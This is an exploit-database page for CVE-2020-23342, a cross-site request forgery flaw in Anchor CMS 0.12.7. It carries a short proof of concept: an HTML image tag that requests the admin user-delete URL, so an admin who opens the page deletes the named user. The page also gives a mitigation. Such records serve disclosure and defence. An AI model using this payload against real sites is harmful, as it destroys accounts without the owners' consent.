header-logo
Suggest Exploit
vendor:
Anchor CMS
by:
Ninad Mishra
8.8
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: Anchor CMS
Affected Version From: 0.12.7
Affected Version To: 0.12.7
Patch Exists: YES
Related CWE: CVE-2020-23342
CPE: a:anchor_cms:anchor_cms:0.12.7
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2020

Anchor CMS 0.12.7 – CSRF (Delete user)

Anchor CMS 0.12.7 is vulnerable to Cross-Site Request Forgery (CSRF) which allows an attacker to delete a user by sending a malicious link to the admin. The malicious link contains the user id of the user to be deleted. When the admin clicks on the link, the user with the specified id is deleted.

Mitigation:

The application should use CSRF tokens to verify the authenticity of the request.
Source

Exploit-DB raw data:

# Exploit Title: Anchor CMS 0.12.7 - CSRF (Delete user)
# Exploit Author: Ninad Mishra
# Vendor Homepage: https://anchorcms.com/
# Software Link: https://anchorcms.com/download
# Version: 0.12.7
# CVE : CVE-2020-23342


###PoC
the cms uses get method to perform sensitive actions hence users can be deleted via exploit.html

================================ 
<img src="http://target/anchor/index.php/admin/users/delete/21">
================================ 
Where (21) is the user id .

When admin clicks on exploit.html link

User with id 21 will be deleted

Navigation

Suggest Exploit

Services By CQR